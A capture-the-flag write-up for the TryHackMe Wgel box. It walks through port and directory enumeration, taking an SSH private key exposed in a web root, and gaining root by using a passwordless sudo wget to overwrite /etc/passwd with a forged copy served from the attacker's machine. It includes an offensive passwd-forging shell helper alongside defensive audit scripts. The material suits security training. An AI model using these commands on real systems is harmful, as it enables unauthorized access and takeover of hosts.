TryHackMe Wgel Writeup

This guide will help you solve the TryHackMe Wgel box. Before we start enumerating the box, add the following line to your /etc/hosts file.

<BOX_IP> wgel.thm

TryHackMe Wgel – Enumeration

As usual, we start by checking for open ports with nmap. Run the following command:

nmap -sV -sC wgel.thm

The -sV flag probes the open ports to detect service versions. The -sC flag runs nmap's default script set against the target. The output of the nmap scan can be seen below:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only ports 22 and 80 are open among the 1000 ports nmap scans by default (add -p- if you want to be sure nothing listens on a higher port). Port 22 runs OpenSSH 7.2p2 and port 80 an Apache 2.4.18 web server that serves the default Ubuntu page. Let's start with enumerating the web server!

TryHackMe Wgel – Enumerating Apache server

By checking out the root directory of the Apache server we see the following page:

(Screenshot: TryHackMe Wgel - Apache default page)

Here we see the default Apache web page. Nothing seems out of the ordinary here. However, when inspecting the page source we find the following snippet:

<!-- Jessie don't forget to udate the webiste -->

The comment gives us a probable username, jessie, which we keep in mind. Next we try to find hidden directories and files using gobuster.

Run gobuster by executing the following command:

gobuster dir -u http://wgel.thm/ -w /usr/share/wordlists/common.txt

The output can be seen below:

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)

The /sitemap directory is new, so we run gobuster again against it to find hidden files and directories inside it:

gobuster dir -u http://wgel.thm/sitemap/ -w /usr/share/wordlists/common.txt

The output can be seen below:

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.ssh (Status: 301)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)

TryHackMe Wgel – User Flag

The directory which stands out here is .ssh, which has no business being inside a web root. It contains a single file, id_rsa, a private SSH key. Download it by running the following command:

wget http://wgel.thm/sitemap/.ssh/id_rsa

This is most likely the private key of the jessie user we saw in the page source. The chmod is required because ssh refuses to use a private key that is readable by other users. Run the following commands:

chmod 400 id_rsa
ssh -i id_rsa jessie@wgel.thm

You should now see the following snippet, indicating that you successfully logged into the server:

Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


8 packages can be updated.
8 updates are security updates.

jessie@CorpOne:~$

The user flag can be found at /home/jessie/Documents/user_flag.txt.
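The exposed key is the kind of thing a web-root audit should catch before an attacker's gobuster does. What follows is an added example, not part of the original writeup: a POSIX shell function that walks a web root (the path is an argument; on an Ubuntu Apache default install that would be /var/www/html) and prints, relative to that root, dot-directories and dot-files with everything inside them, key-like file names, and small files whose contents carry a PEM private-key header regardless of name. The function name is my own.

```shell
#!/bin/sh
# Added example, not from the original writeup: list files under a web root
# that should never be reachable over HTTP, such as the sitemap/.ssh/id_rsa
# found on this box. The function name is an assumption; the web root path
# is passed in as the only argument.

# find_exposed_secrets WEBROOT
#   Prints one path per line (relative to WEBROOT, de-duplicated) for:
#     - dot-directories and dot-files and everything inside them
#       (.ssh, .git, .htpasswd, .env, ...)
#     - files whose name looks like a key (id_*, *.pem, *.key)
#     - regular files under 64 KiB containing a PEM private-key header,
#       whatever their name (a renamed key such as backup.txt is the usual
#       surprise, and no filename pattern catches it)
#   Permission errors are discarded so the list stays clean; run it as a user
#   that can read the whole tree (the web server's own user is a good choice,
#   since that is exactly what Apache can serve).
find_exposed_secrets() {
    (
        cd "$1" || exit 1
        # anything at or below a dot-entry: "./sitemap/.ssh" and "./sitemap/.ssh/id_rsa"
        find . -path '*/.*' -print
        # key-like names anywhere, dot-directory or not
        find . -type f \( -name 'id_*' -o -name '*.pem' -o -name '*.key' \) -print
        # key-like contents: PEM header of an RSA, EC, OPENSSH or PKCS#8 private key
        find . -type f -size -64k -exec grep -l -e '-----BEGIN .*PRIVATE KEY-----' {} +
    ) 2>/dev/null | sort -u
}

# Usage: find_exposed_secrets /var/www/html
# Anything printed should be moved out of the web root, and a private key
# found there must be treated as already compromised and rotated.
```

Because the third `find` looks at file contents, it also flags keys that were renamed or dropped into an innocent-looking directory such as /images, which is where a name-only scan would miss them.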

TryHackMe Wgel – Root Flag

Running sudo -l lists the commands the jessie user is allowed to run with sudo. Run it to see the following snippet:

Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

The first rule would let jessie run anything, but it asks for her password, which we do not have. The second rule is what we can use: we are allowed to run wget as root without a password! GTFOBins lists the trick for this case. wget's -O option writes the downloaded file to any path, and since it runs as root that includes /etc/passwd, so we overwrite /etc/passwd with a copy in which root's password field holds a hash of our choosing. First, on the target (in your SSH session as jessie), copy the current /etc/passwd to /tmp and serve it with Python's built-in web server:

cp /etc/passwd /tmp
cd /tmp
python3 -m http.server

Then fetch the copy on your attacking machine:

wget http://wgel.thm:8000/passwd

(/etc/passwd is world-readable, so you could just as well cat it and paste it into a local file; serving it over HTTP simply avoids copy-and-paste mistakes.)

Currently, the passwd file has the following contents:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin

Normally the second field of each entry is x, which tells the system to look the real hash up in /etc/shadow. If that field contains a hash instead, the hash is used directly, so putting a hash of our own into root's entry gives us root's password. Generate one with openssl (obz is the password we pick):

openssl passwd obz

In this run the output was fMCLXeGpn7bFY. Yours will differ, because the salt is random, and newer OpenSSL releases may print a longer hash starting with $1$ or $6$ instead of this 13-character DES crypt form; any crypt(3)-style hash works in this field. Use the value from your own run and change the first line of the passwd file to:

root:fMCLXeGpn7bFY:0:0:root:/root:/bin/bash

Save the file and start a new Python web server on your attacking machine, from the directory that holds the modified passwd file:

python3 -m http.server

The last step is to run the following commands on the target, in your SSH session as jessie:

sudo wget http://<ATTACK_MACHINE>:8000/passwd -O /etc/passwd
su
PROVIDE "obz" HERE

Note: the capitalised words are not commands; type the password you hashed when su asks for one. Before running the wget, make sure the target can actually reach your web server (for example with a plain, unprivileged wget of the file into /tmp first). With -O, wget truncates the destination before the download begins, so a failed download leaves an empty /etc/passwd behind, and with no valid entries nobody, root included, can log in or use sudo any more.

If all goes well, you should see the following in your terminal:

root@CorpOne:/home/jessie# 

This means that we are the root user and have pwned the box! The root flag is located at /root/root_flag.txt.
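To make the passwd step less error-prone, here is an added example that is not part of the original writeup: two POSIX shell functions for the attacking machine. forge_passwd rewrites only root's password field of the copied passwd file with the hash that openssl passwd printed for you, and audit_passwd checks the result before you serve it, refusing files with malformed lines, empty password fields or anything other than exactly one UID 0 account, since a broken /etc/passwd locks everyone out of the box. The function names, file names and the hash in the comments are assumptions. audit_passwd also reports every account whose password field holds a hash instead of x, which is exactly the trace this technique leaves on a compromised host, so the same function works as a defender-side check against a live /etc/passwd.

```shell
#!/bin/sh
# Added example, not from the original writeup: build the modified passwd on
# the attacking machine and sanity-check it before serving it to the target.
# Function names, file names and the sample hash are assumptions.

# forge_passwd ORIGINAL HASH OUTPUT
#   Copies ORIGINAL to OUTPUT, replacing only root's password field with HASH.
#   HASH is whatever `openssl passwd <password>` printed for you; it differs on
#   every run because the salt is random, so never reuse one from a writeup.
#   Every other line is printed untouched.
forge_passwd() {
    awk -F: -v OFS=: -v hash="$2" '$1 == "root" { $2 = hash } { print }' "$1" > "$3"
}

# audit_passwd FILE
#   Prints one line per finding. Returns 1 if FILE is unsafe to install as
#   /etc/passwd (a broken passwd file locks everyone out, root included):
#     - a line without exactly 7 colon-separated fields
#     - an account with an empty password field (passwordless login)
#     - any number of UID 0 accounts other than one
#   Accounts whose password field holds a hash instead of "x" (or a locked
#   marker "*" / "!") are reported but do not fail the check: that is the one
#   change we want on the attacking side, and the artefact to hunt for on a
#   host that may have been tampered with this way.
audit_passwd() {
    awk -F: '
        BEGIN { bad = 0; uid0 = 0 }
        NF != 7 { print "malformed line " NR ": " $0; bad = 1; next }
        $2 == "" { print "empty password field: " $1; bad = 1 }
        $3 == "0" { uid0++ }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print "hash stored in passwd: " $1 }
        END {
            if (uid0 != 1) { print "UID 0 accounts: " uid0; bad = 1 }
            exit bad
        }' "$1"
}

# Usage on the attacking machine, after `wget http://wgel.thm:8000/passwd`:
#   forge_passwd passwd "$(openssl passwd obz)" passwd.new
#   audit_passwd passwd.new && mv passwd.new passwd
# Only then start `python3 -m http.server` and run the sudo wget on the target.
```

Running audit_passwd against a copied /etc/passwd from a host you are investigating gives the reverse view: a line such as "hash stored in passwd: root" or an unexpected second UID 0 account is a strong indicator that someone has already done to that host what this writeup does to Wgel.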

This was a nice and simple box to root. The key take-away is that any binary that can write arbitrary files as root, even one as innocuous-looking as wget with its -O option, is equivalent to full root once it appears in sudoers with NOPASSWD, and that a private key left inside a web root is as good as a password in the page source.
